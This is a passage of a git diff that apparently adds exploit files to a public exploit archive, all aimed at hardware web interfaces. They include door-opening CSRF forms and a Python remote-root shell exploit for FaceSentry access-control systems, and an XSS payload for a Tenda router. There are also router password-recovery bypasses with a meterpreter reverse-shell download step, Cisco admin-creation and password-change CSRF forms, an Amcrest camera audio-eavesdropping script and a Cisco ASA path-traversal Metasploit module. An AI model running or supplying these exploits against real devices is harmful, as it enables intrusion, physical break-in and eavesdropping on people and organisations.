+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
+
+
+CSRF open door 0:
+-----------------
+<html>
+  <body>
+  <script>history.pushState('', 'CSRF', 'sentryInfo.php')</script>
+    <form action="http://192.168.11.1/openDoor.php?" method="POST">
+      <input type="hidden" name="strInAction" value="openDoor" />
+      <input type="hidden" name="strInPageNo" value="0" />
+      <input type="hidden" name="strInRestartAction" value="" />
+      <input type="hidden" name="strPanelIDRestart=" value="" />
+      <input type="hidden" name="strPanelRestartAction" value="" />
+      <input type="submit" value="Submit" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47066.py b/exploits/hardware/webapps/47066.py
new file mode 100755
index 000000000..47f2e5bbf
--- /dev/null
+++ b/exploits/hardware/webapps/47066.py
@@ -0,0 +1,216 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+#
+#
+# FaceSentry Access Control System 6.4.8 Remote Root Exploit
+#
+#
+# Vendor: iWT Ltd.
+# Product web page: http://www.iwt.com.hk
+# Affected version: Firmware 6.4.8 build 264 (Algorithm A16)
+#                   Firmware 5.7.2 build 568 (Algorithm A14)
+#                   Firmware 5.7.0 build 539 (Algorithm A14)
+#
+# Summary: FaceSentry 5AN is a revolutionary smart identity
+# management appliance that offers entry via biometric face
+# identification, contactless smart card, staff ID, or QR-code.
+# The QR-code upgrade allows you to share an eKey with guests
+# while you're away from your Office and monitor all activity
+# via the web administration tool. Powered by standard PoE
+# (Power over Ethernet), FaceSEntry 5AN can be installed in
+# minutes with only 6 screws. FaceSentry 5AN is a true enterprise
+# grade access control or time-and-attendance appliance.
+#
+# Desc: FaceSentry suffers from an authenticated OS command
+# injection vulnerability using default credentials. This can
+# be exploited to inject and execute arbitrary shell commands
+# as the root user via the 'strInIP' POST parameter in pingTest
+# PHP script.
+#
+# ==============================================================
+# /pingTest.php:
+# --------------
+# 8:  if (!isAuth('TestTools','R')){
+# 9:      echo "No Permission";
+# 10:     include("footer.php");
+# 11:     exit;
+# 12:  }
+# 13:
+# 14: if(isset($_POST["strInIP"])){
+# 15:     $strInIP = $_POST["strInIP"];
+# 16: }else{
+# 17:     $strInIP = "";
+# 18: }
+# 19:
+# 20: $strOperationResult = "";
+# 21: if ($strInIP != ""){
+# 22:
+# 23:    $out = array(); 
+# 24:    exec("sudo ping -c 4 $strInIP",$out);
+# 25:    $result = "";    
+# 26:    foreach($out as $line){
+# 27:        $result = $result.$line."<br>";        
+# 28:    }
+# ==============================================================
+#
+# Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus)
+#            Linux 3.4.113-sun8i (armv7l)
+#            PHP/7.0.30-0ubuntu0.16.04.1
+#            PHP/7.0.22-0ubuntu0.16.04.1
+#            lighttpd/1.4.35
+#            Armbian 5.38
+#            Sunxi Linux (sun8i generation)
+#            Orange Pi PC +
+#
+#
+# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+#                             @zeroscience
+#
+#
+# Advisory ID: ZSL-2019-5525
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php
+#
+#
+# 28.05.2019
+#
+
+import datetime########INITIALIZE
+import urllib2#########BIOMETRICS
+import urllib##########FACIAL.REC
+import time############OGNITION.S
+import sys##(.)###(.)##YSTEM.DOOR
+import re#######O######UNLOCKED.A
+import os#######_######CCESS.GRAN
+import io######(_)#####TED.0B1000
+import py##############1.11111011
+
+from cookielib import CookieJar
+
+global pajton
+pajton = os.path.basename(sys.argv[0])
+
+def usage():
+    if len(sys.argv) < 2:
+        print '[+] Usage: ./' + pajton + ' <ip>\n'
+        sys.exit()
+
+def auth():
+    brojac = 0
+    usernames = [ 'admin', 'user', 'administrator' ] # case sensitive
+    passwords = [ '123', '123', '123456' ]
+    while brojac < 3:
+        podatoci = { 'strInLogin'    : usernames[brojac],
+                     'strInPassword' : passwords[brojac],
+                     'saveLogin'     : '1',
+                     'saveFor'       : '168' } # 7 days
+        print '[+] Trying creds ' + usernames[brojac] + ':' + passwords[brojac]
+        nesto_encode = urllib.urlencode(podatoci)
+        ajde.open('http://' + target + '/login.php', nesto_encode)
+        check = ajde.open('http://' + target + '/sentryInfo.php')
+        dool = re.search(r'Hardware Key', check.read())
+        if dool:
+            print '[+] That worked!'
+            break
+        else:
+            brojac += 1
+            if brojac == 3:
+                print '[!] Ah ah ah. You didn\'t say the magic word!'
+                sys.exit()
+
+def door():
+    unlock = raw_input('[*] Unlock door No.: ') # default door number = 0
+    try:
+        br = int(unlock)
+        panel = { 'strInAction'           : 'openDoor',
+                  'strInPanelNo'          : br,
+                  'strInRestartAction'    : '',
+                  'strPanelIDRestart'     : '',
+                  'strPanelRestartAction' : '' }
+        nesto_encode = urllib.urlencode(panel)
+        ajde.open('http://' + target + '/openDoor.php', nesto_encode)
+        print '[+] Door ' + unlock + ' is unlocked!'
+    except ValueError:
+        print '[!] Only values from 0 to 8 are valid.'
+        door()
+
+def main():
+    if os.name == 'posix':
+        os.system('clear')
+    if os.name == 'nt':
+        os.system('cls')
+
+    vremetodeneska = datetime.datetime.now()
+    kd = vremetodeneska.strftime('%d.%m.%Y %H:%M:%S')
+    print 'Starting exploit at ' + kd
+
+    print '''
+──────────────────────────────────
+──FaceSentry Access Control System
+────────Remote Root Exploit
+─────────Zero Science Lab
+────────www.zeroscience.mk
+───────────ZSL-2019-5525
+─────────────▄▄▄▄▄▄▄▄▄
+─────────────▌▐░▀░▀░▀▐
+─────────────▌░▌░░░░░▐
+─────────────▌░░░░░░░▐
+─────────────▄▄▄▄▄▄▄▄▄
+───────▄▀▀▀▀▀▌▄█▄░▄█▄▐▀▀▀▀▀▄
+──────█▒▒▒▒▒▐░░░░▄░░░░▌▒▒▒▒▒█
+─────▐▒▒▒▒▒▒▒▌░░░░░░░▐▒▒▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▒█░▀▀▀▀▀░█▒▒▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▒▒█▄▄▄▄▄█▒▒▒▒▒▒▒▒▌
+─────▐▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▌
+─────▐▒▒▒▒▒█▒▒▒▒▒▒▒▒▒▒▒█▒▒▒▒▒▌
+─────▐▒▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▌▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▌▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▒▌
+─────▐▒▒▒▒▒▒▌▄▄▄▄▄▄▄▄▄▐▒▒▒▒▒▒▌
+─────▐▄▄▄▄▄▄▌▌███████▌▐▄▄▄▄▄▄▌
+──────█▀▀▀▀█─▌███▌███▌─█▀▀▀▀█
+──────▐░░░░▌─▌███▌███▌─▐░░░░▌
+───────▀▀▀▀──▌███▌███▌──▀▀▀▀
+─────────────▌███▌███▌
+─────────────▌███▌███▌
+───────────▐▀▀▀██▌█▀▀▀▌
+▒▒▒▒▒▒▒▒▒▒▒▐▄▄▄▄▄▄▄▄▄▄▌▒▒▒▒▒▒▒▒▒▒▒
+    '''
+
+    usage()
+    tegla = CookieJar()
+    global ajde, target
+    target = sys.argv[1]
+    ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla))
+    auth()
+    raw_input('\n[*] Press [ENTER] to land... ')
+
+    print '[+] Entering interactive (web)shell...'
+    time.sleep(1)
+    print
+
+    while True:
+        try:
+            cmd = raw_input('root@facesentry:~# ')
+            if 'exit' in cmd.strip():
+                print '[+] Take care now, bye bye then!'
+                break
+            if 'door' in cmd.strip():
+                door()
+                continue
+            podatoci = { 'strInIP' : ';sudo ' + cmd } # |cmd
+            nesto_encode = urllib.urlencode(podatoci)
+            r_izraz = ajde.open('http://' + target + '/pingTest.php?', nesto_encode)
+            pattern = re.search(cmd+'\)<[^>]*>(.*?)</font>', r_izraz.read())
+            x = pattern.groups()[0].strip()
+            y = x.replace('<br>', '\n')
+            print y.strip()
+        except Exception as i:
+            print '[-] Error: ' + i.message
+            pass
+        except KeyboardInterrupt as k:
+            print '\n[+] Interrupter!'
+            sys.exit()
+
+    sys.exit()
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47107.txt b/exploits/hardware/webapps/47107.txt
new file mode 100644
index 000000000..15b877da8
--- /dev/null
+++ b/exploits/hardware/webapps/47107.txt
@@ -0,0 +1,17 @@
+# Exploit Title: tenda D301 v2 modem router stored xss CVE-2019-13492
+# Exploit Author: ABDO10
+# Date : July, 11th 2019
+# Product : Tenda D301 v2  Modem Router
+# version : v2
+# Vendor Homepage: https://www.tp-link.com/au/home-networking/dsl-modem-router/td-w8960n/
+# Tested on: Linux
+# CVE : 2019-13491
+
+
+# Poc Instructions :
+/*******************************************************************************************************************/
+> 1 - Open modem router  on web browser default(192.168.1.1)
+> 2 - Click on advanced -> Wireless -> Security
+> 3 - fill this payload : <img src="xy" OnError=prompt(document.cookie)>  as password
+> 4 - Click on "click to display"
+/*******************************************************************************************************************/
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47117.txt b/exploits/hardware/webapps/47117.txt
new file mode 100644
index 000000000..5dc1b38e3
--- /dev/null
+++ b/exploits/hardware/webapps/47117.txt
@@ -0,0 +1,78 @@
+# Exploit Title: NETGEAR WiFi Router R6080 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: R6080-100PES
+# Firmware Version: 1.0.0.34 / 1.0.0.40
+# Vendor Homepage: https://www.netgear.com/support/product/R6080.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/R6080/(R6080-V1.0.0.34.zip or R6080-V1.0.0.40.zip)
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.0.0.34WW
+Model=R6080
+>> http://192.168.1.1:56688/rootDesc.xml (Server: Unspecified, UPnP/1.0, Unspecified)
+<serialNumber>SSSSSSSNNNNNN</serialNumber>
+
+== Security Questions Bypass > Answers Disclosure ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+<POST REQUEST>
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+<POST RESPONSE>
+<input type="text" maxLength="64" size="30" name="answer1" onFocus="this.select();" value="AnSw3R-1">
+<input type="text" maxLength="64" size="30" name="answer2" onFocus="this.select();" value="AnSw3R-2">
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+R6080 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
+
+
+
+# Exploit Title: NETGEAR WiFi Router JWNR2010v5 - Security Questions Answers Disclosure
+# Date: 13/07/2019
+# Exploit Author: Wadeek
+# Hardware Version: JWNR2010v5
+# Firmware Version: 1.1.0.54
+# Vendor Homepage: https://www.netgear.com/support/product/JWNR2010v5.aspx
+# Firmware Link: http://www.downloads.netgear.com/files/GDC/JNR1010V2/N300-V1.1.0.54_1.0.1.zip
+# Shodan Dork: "HTTP/1.1 401 Unauthorized" "Set-Cookie: sessionid=" "NETGEAR JWNR2010v5"
+
+== Files Containing Juicy Info ==
+>> http://192.168.1.1/currentsetting.htm
+Firmware=V1.1.0.54
+Model=JWNR2010v5
+>> http://192.168.1.1/BRS_netgear_success.html (Serial Number)
+setTimeout('top.location.href = "http://www.netgear.com/success/JWNR2010v5.aspx?sn=SSSSSSSNNNNNN";',2000);
+
+== Security Questions Bypass > Answers Disclosure (only if "Password Recovery" is "Enable") ==
+>> http://192.168.1.1/401_recovery.htm (SSSSSSSNNNNNN value for input)
+<POST REQUEST>
+htpwd_recovery.cgi?id=XXXXXXXXXXXXXXX (one attempt because /tmp/SessionFile.*.htm)
+(replace)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=securityquestions.htm&SID=
+(by)
+dev_serial=SSSSSSSNNNNNN&todo=verify_sn&this_file=401_recovery.htm&next_file=PWD_password.htm&SID=
+<POST RESPONSE>
+<input type="text" maxLength="64" size="30" name="htpwd_answer1" onFocus="this.select();" value="AnSw3R-1">
+<input type="text" maxLength="64" size="30" name="htpwd_answer2" onFocus="this.select();" value="AnSw3R-2">
+(repeat recovery process for get admin password)
+
+== Authenticated Telnet Command Execution ==
+>> http://admin:Str0nG-!P4ssW0rD@192.168.1.1/setup.cgi?todo=debug
+:~$ telnet 192.168.1.1
+JWNR2010v5 login: admin
+Password: Str0nG-!P4ssW0rD
+{
+upload by TFTP # tftp -p -r [LOCAL-FILENAME] [IP] [PORT]
+download by TFTP # tftp -g -r [REMOTE-FILENAME_ELF_32-bit_LSB_executable_MIPS || linux/mipsle/meterpreter/reverse_tcp] [IP] [PORT]
+}
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47118.txt b/exploits/hardware/webapps/47118.txt
new file mode 100644
index 000000000..365b4611e
--- /dev/null
+++ b/exploits/hardware/webapps/47118.txt
@@ -0,0 +1,121 @@
+# Exploit Title: CISCO Small Business 200, 300, 500 Switches Multiple Vulnerabilities.
+# Shodan query: /config/log_off_page.html
+# Discovered Date: 07/03/2014
+# Reported Date: 08/04/2019
+# Exploit Author: Ramikan 
+# Website: http://fact-in-hack.blogspot.com
+# Vendor Homepage:https://www.cisco.com/c/en/us/products/switches/small-business-300-series-managed-switches/index.html
+# Affected Devices:  The affected products are all Cisco Small Business 200, 300, and 500 Series Managed Switches with the web management interface enabled, 
+# Tested On: Cisco C300 Switch
+# Version: 1.3.7.18
+# CVE : CVE-2019-1943
+# CVSS v3: 4.7 (AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)
+# Category:Hardware, Web Apps
+# Reference : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+
+*************************************************************************************************************************************
+
+Vulnerability 1: Information Gathering
+
+*************************************************************************************************************************************
+
+Unauthenticated user can find the version number and device type by visiting this link directly.
+
+Affected URL:
+
+/cs703dae2c/device/English/dictionaryLogin.xml
+
+*************************************************************************************************************************************
+
+Vulnerability 2: Open Redirect due to host header.
+
+*************************************************************************************************************************************
+
+Can change to different domain under the host header and redirect the request to fake website and can be used for phishing attack also can be used for domain fronting.
+
+Normal Request
+
+GET / HTTP/1.1
+Host: 10.1.1.120
+Accept-Encoding: gzip, deflate
+Accept: */*
+Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+
+Normal Response
+
+HTTP/1.1 302 Redirect
+Server: GoAhead-Webs
+Date: Fri Mar 07 09:40:22 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: https://10.21.151.120/cs703dae2c/
+
+<html><head></head><body>
+                        This document has moved to a new <a href="https://10.1.1.120/cs703dae2c/">location</a>.
+                        Please update your documents to reflect the new location.
+                        </body></html>
+*************************************************************************************************************************************
+POC 
+*************************************************************************************************************************************
+
+Host Header changed to different domain (example google.com).
+
+Request:
+
+GET /cs703dae2c HTTP/1.1
+Host: google.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-GB,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: activeLangId=English; isStackableDevice=false
+Upgrade-Insecure-Requests: 1
+
+
+Response:
+
+HTTP/1.1 302 Redirect
+activeLangId=English; isStackableDevice=falseServer: GoAhead-Webs
+Date: Fri Mar 07 09:45:26 2014
+Connection: close
+Pragma: no-cache
+Cache-Control: no-cache
+Content-Type: text/html
+Location: http://google.com/cs703dae2c/config/log_off_page.htm
+
+<html><head></head><body>
+                        This document has moved to a new <a href="http://google.com/cs703dae2c/config/log_off_page.htm">location</a>.
+                        Please update your documents to reflect the new location.
+                        </body></html>
+
+
+The redirection is happening to http://google.com/cs703dae2c/config/log_off_page.htm. The attacker need to be in same network and should be able to modify the victims request on the wire in order to trigger this vulnerabilty.
+
+*************************************************************************************************************************************
+Attack Vector:
+*************************************************************************************************************************************
+Can be used for domain fronting.
+
+curl -k --header "Host: attack.host.net" "domainname of the cisco device"
+
+
+*************************************************************************************************************************************
+Vendor Response:
+*************************************************************************************************************************************
+
+Issue 1:
+Due to the limited information given out, we are not considering it a vulnerability as such. Still, it would be better if it was not happening, so, we will treat it as a hardening enhancement.
+
+Issue 2:
+The developers won't be able to provide a fix for this in the short term (90 days), so, we are planning to disclose this issue through an advisory on July 17th 2019.
+
+We have assigned CVE CVE-2019-1943 for this issue.
+
+Reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190717-sbss-redirect
+*************************************************************************************************************************************
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47153.txt b/exploits/hardware/webapps/47153.txt
new file mode 100644
index 000000000..dd558648d
--- /dev/null
+++ b/exploits/hardware/webapps/47153.txt
@@ -0,0 +1,35 @@
+# Product : Cisco Wireless Controller
+# Version : 3.6.10E (last version)
+# Date: 23.07.2019
+# Vendor Homepage: https://www.cisco.com
+# Exploit Author: Mehmet Önder Key
+# Website: htts://cloudvist.com
+# CVE: CVE-2019-12624
+# Description : The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to verify
+the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site.
+# Tested On : Win10 & KaliLinux
+
+Add Admin CSRF Payload @Cisco Wireless Controller
+---------------
+<html>
+  <body>
+    <form action="http://IP/security/cfgSecurityAAAUsersCreate
+<http://192.168.115.83/security/cfgSecurityAAAUsersCreate>" method="POST">
+      <input type="hidden" name="username" value="secretadmin" />
+      <input type="hidden" name="privilege" value="15" />
+      <input type="hidden" name="password" value="K3Y" />
+      <input type="hidden" name="description" value="CSRF" />
+      <input type="hidden" name="type" value="lobby-admin" />
+      <input type="hidden" name="cfnpassword" value="K3Y" />
+      <input type="hidden" name="yearlife" value="2013" />
+      <input type="hidden" name="hourlife" value="16" />
+      <input type="hidden" name="monthlife" value="7" />
+      <input type="hidden" name="minlife" value="17" />
+      <input type="hidden" name="datelife" value="16" />
+      <input type="hidden" name="seclife" value="0" />
+      <input type="submit" value="submit" />
+    </form>
+  </body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47188.py b/exploits/hardware/webapps/47188.py
new file mode 100755
index 000000000..59da6a224
--- /dev/null
+++ b/exploits/hardware/webapps/47188.py
@@ -0,0 +1,127 @@
+##
+# Exploit Title: Unauthenticated Audio Streaming from Amcrest Camera
+# Shodan Dork: html:"@WebVersion@"
+# Date: 08/29/2019
+# Exploit Author: Jacob Baines
+# Vendor Homepage: https://amcrest.com/
+# Software Link: https://amcrest.com/firmwaredownloads
+# Affected Version: V2.520.AC00.18.R
+# Fixed Version: V2.420.AC00.18.R
+# Tested on: Tested on Amcrest IP2M-841 but known to affect other Dahua devices.
+# CVE : CVE-2019-3948
+# Disclosure: https://www.tenable.com/security/research/tra-2019-36
+# Disclosure: https://sup-files.s3.us-east-2.amazonaws.com/Firmware/IP2M-841/JS+IP2M-841/Changelog/841_721_HX1_changelog_20190729.txt
+#
+# To decode the scripts output using ffplay use:
+# 	ffplay -f alaw -ar 8k -ac 1 [poc output]
+# Note that this assumes the camera is using the default encoding options.
+##
+import argparse
+import socket
+import struct
+import sys
+
+##
+# Read in the specified amount of data. Continuing looping until we get it all...
+# what could go wrong?
+#
+# @return the data we read in
+##
+def recv_all(sock, amount):
+	data = ''
+	while len(data) != amount:
+		temp_data = sock.recv(amount - len(data))
+		data = data + temp_data
+
+	return data
+
+top_parser = argparse.ArgumentParser(description='Download audio from the HTTP videotalk endpoint')
+top_parser.add_argument('-i', '--ip', action="store", dest="ip", required=True, help="The IPv4 address to connect to")
+top_parser.add_argument('-p', '--port', action="store", dest="port", type=int, help="The port to connect to", default="80")
+top_parser.add_argument('-o', '--output', action="store", dest="output", help="The file to write the audio to")
+top_parser.add_argument('-b', '--bytes', action="store", dest="bytes", type=int, help="The amount of audio to download", default="1048576")
+args = top_parser.parse_args()
+
+sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+sock.setblocking(True)
+
+print "[+] Attempting connection to " + args.ip + ":" + str(args.port)
+sock.connect((args.ip, args.port))
+print "[+] Connected!"
+
+request = ('GET /videotalk HTTP/1.1\r\n' +
+	       'Host: ' + args.ip + ':' + str(args.port) + '\r\n' +
+	       'Range: bytes=0-\r\n' +
+	       '\r\n')
+sock.sendall(request)
+
+status = ''
+header = ''
+
+# read in the HTTP response. Store the status.
+while (header != '\r\n'):
+	header = header + sock.recv(1);
+	if (header.find('\r\n') > 0):
+		header = header.strip()
+		if (len(status) == 0):
+			status = header
+		header = ''
+
+if (status.find('200 OK') == -1):
+	print '[-] Bad HTTP status. We received: "' + status + '"'
+	sock.close()
+	exit()
+else:
+	print '[+] Downloading ' + str(args.bytes) + ' bytes of audio ...'
+
+total_audio = ''
+while (len(total_audio) < args.bytes):
+
+	# read in the header length
+	header_length = recv_all(sock, 4)
+	hlength = struct.unpack("I", header_length)[0]
+	if (hlength != 36):
+		print '[-] Unexpected header length'
+		sock.close()
+		exit()
+
+	# read in the header and extract the payload length
+	header = recv_all(sock, hlength)
+	plength = struct.unpack_from(">H", header)[0]
+	if (plength != 368):
+		print '[-] Unexpected payload length'
+		sock.close()
+		exit()
+
+	# there is a seq no in the header but since this is over
+	# tcp is sort of useless.
+
+	dhav = header[2:6]
+	if (dhav != "DHAV"):
+		print '[-] Invalid header'
+		exit(0)
+
+	# extract the audio. I'm really not sure what the first 6 bytes are
+	# but the last 8 serve as a type of trailer
+	whatami = recv_all(sock, 6)
+	audio = recv_all(sock, plength - hlength - 12)
+	trailer = recv_all(sock, 8)
+
+	if (trailer != 'dhavp\x01\x00\x00'):
+		print '[-] Invalid end of frame'
+		sock.close()
+		exit()
+
+	total_audio = total_audio + audio
+	sys.stdout.write('\r'+ str(len(total_audio)) + " / " + str(args.bytes))
+	sys.stdout.flush()
+
+print ''
+print '[+] Finished receiving audio.'
+print '[+] Closing socket'
+
+out_file = open(args.output, 'wb')
+out_file.write(total_audio)
+out_file.close()
+
+sock.close()
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47203.html b/exploits/hardware/webapps/47203.html
new file mode 100644
index 000000000..46a275a6f
--- /dev/null
+++ b/exploits/hardware/webapps/47203.html
@@ -0,0 +1,63 @@
+# Product : Catalyst 3850 Series Device Manager
+# Version : 3.6.10E
+# Date: 01.08.2019
+# Vendor Homepage: https://www.cisco.com
+# Exploit Author: Alperen Soydan
+# Description : The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks to verify
+the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site.
+@special thx:Haki Bülent Sever
+# Tested On : Win10 & KaliLinux
+
+
+Change Switch Password CSRF @Catalyst 3850 Series Device Manager
+note : You must edit the values written by "place"
+___________________________________________________________
+
+<html>
+<body>
+<form
+action="http://IP/%24moreField%20%0A%24a%20%24b1%0A%24c1%0A%24c2%0Awrite%20memory%0A"
+method="POST">
+<input type="hidden" name="SNMP_STATUS" value="SNMP+agent+enabled%0D%0A" />
+<input type="hidden" name="send" value="nsback.htm" />
+<input type="hidden" name="SNMP_READCOMM_DEFVAL" value="ELVIS" />
+<input type="hidden" name="SNMP_CONTACT_DEFVAL" value="Network+Support+Group" />
+<input type="hidden" name="SNMP_LOCATION_DEFVAL" value="TEST2" />
+<input type="hidden" name="text_ipAddress0" value="place first octet" />
+<input type="hidden" name="text_ipAddress1" value="place second octet" />
+<input type="hidden" name="text_ipAddress2" value="place third octet" />
+<input type="hidden" name="text_ipAddress3" value="place fourth octet" />
+<input type="hidden" name="list_subnetMask" value="place subnet mask ip" />
+<input type="hidden" name="text_ipDefaultGateway0" value="place gw ip first octet" />
+<input type="hidden" name="text_ipDefaultGateway1" value="place gw ip second octet" />
+<input type="hidden" name="text_ipDefaultGateway2" value="place gw ip third octet" />
+<input type="hidden" name="text_ipDefaultGateway3" value="palce gw ip fourth octet" />
+<input type="hidden" name="text_enableSecret" value="KEY" />
+<input type="hidden" name="text_confirmEnableSecret" value="KEY" />
+<input type="hidden" name="text_sysName" value="SW_TEST" />
+<input type="hidden" name="list_date" value="19" />
+<input type="hidden" name="list_month" value="Jul" />
+<input type="hidden" name="list_year" value="2019" />
+<input type="hidden" name="list_hour" value="10" />
+<input type="hidden" name="list_minute" value="20" />
+<input type="hidden" name="list_period" value="AM" />
+<input type="hidden" name="list_timezone" value="C" />
+<input type="hidden" name="radio_telnetAccess" value="disable" />
+<input type="hidden" name="radio_snmpStatus" value="enable" />
+<input type="hidden" name="text_snmpReadComm" value="ELVIS" />
+<input type="hidden" name="text_sysContact" value="Network+Support+Group" />
+<input type="hidden" name="text_sysLocation" value="TEST2" />
+<input type="hidden" name="list_ipv6_interface" value="Vlan500" />
+<input type="hidden" name="list_prefix" value="64" />
+<input type="hidden" name="moreField" value="more flash:/html/more.txt" />
+<input type="hidden" name="a" value="cluster pref file e.cli" />
+<input type="hidden" name="z" value="cluster pref file append e.cli" />
+<input type="hidden" name="b1" value="!enable secret KEY!ip http authentication enable!end" />
+<input type="hidden" name="c1" value="copy e.cli running-config" />
+<input type="hidden" name="c2" value="delete /force e.cli" />
+<input type="submit" value="submit form" />
+</form>
+</body>
+</html>
\ No newline at end of file
diff --git a/exploits/hardware/webapps/47220.rb b/exploits/hardware/webapps/47220.rb
new file mode 100755
index 000000000..9b2bddf82
--- /dev/null
+++ b/exploits/hardware/webapps/47220.rb
@@ -0,0 +1,115 @@
+require 'msf/core'
+
+  class MetasploitModule < Msf::Auxiliary
+
+    include Msf::Exploit::Remote::HttpClient
+
+        def initialize(info={})
+      super(update_info(info,
+          'Name'           => "Cisco Adaptive Security Appliance  - Path Traversal",
+          'Description'    => %q{
+            Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
+        A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
+        Google Dork:inurl:+CSCOE+/logon.html
+          },
+          'License'        => MSF_LICENSE,
+          'Author'         =>
+        [
+            'Yassine Aboukir',   #Initial  discovery
+            'Angelo Ruwantha @h3llwings'      #msf module
+        ],
+          'References'     =>
+        [
+            ['EDB', '44956'],
+            ['URL', 'https://www.exploit-db.com/exploits/44956/']
+        ],
+          'Arch'           => ARCH_CMD,
+         'Compat'          =>
+        {
+            'PayloadType' => 'cmd'
+        },
+          'Platform'       => ['unix','linux'],
+          'Targets'        =>
+        [
+            ['3000 Series Industrial Security Appliance (ISA)
+          ASA 1000V Cloud Firewall
+          ASA 5500 Series Adaptive Security Appliances
+          ASA 5500-X Series Next-Generation Firewalls
+          ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
+          Adaptive Security Virtual Appliance (ASAv)
+          Firepower 2100 Series Security Appliance
+          Firepower 4100 Series Security Appliance
+          Firepower 9300 ASA Security Module
+          FTD Virtual (FTDv)', {}]
+        ],
+          'Privileged'     => false,
+          'DefaultTarget'  => 0))
+
+        register_options(
+        [
+          OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
+          OptString.new('SSL', [true, 'set it as true', 'true']),
+          OptString.new('RPORT', [true, '443', '443']),
+        ], self.class)
+    end
+
+
+    def run
+      uri = target_uri.path
+
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
+        
+      })
+ 
+
+      if res && res.code == 200 && res.body.include?("{'name'")
+        print_good("#{peer} is Vulnerable")
+        print_status("Directory Index ")
+        print_good(res.body)
+             res_dir = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
+        
+        })
+        res_users = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
+        
+        })
+        userIDs=res_users.body.scan(/[0-9]\w+/).flatten
+        
+        print_status("CSCEO Directory ") 
+        print_good(res_dir.body)
+    
+        print_status("Active Session(s) ")
+        print_status(res_users.body)
+        x=0
+        begin
+        print_status("Getting User(s)")
+        while (x<=userIDs.length)
+          users = send_request_cgi({
+          'method'   => 'GET',
+          'uri'      => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
+          
+          })
+         
+          grab_username=users.body.scan(/user:\w+/)
+          nonstr=grab_username
+          if (!nonstr.nil? && nonstr!="")
+            print_good("#{nonstr}")
+          end
+          x=x+1
+        end
+        rescue
+          print_status("Complete")
+        end
+         
+         
+      else
+        print_error("safe")
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
\ No newline at end of file
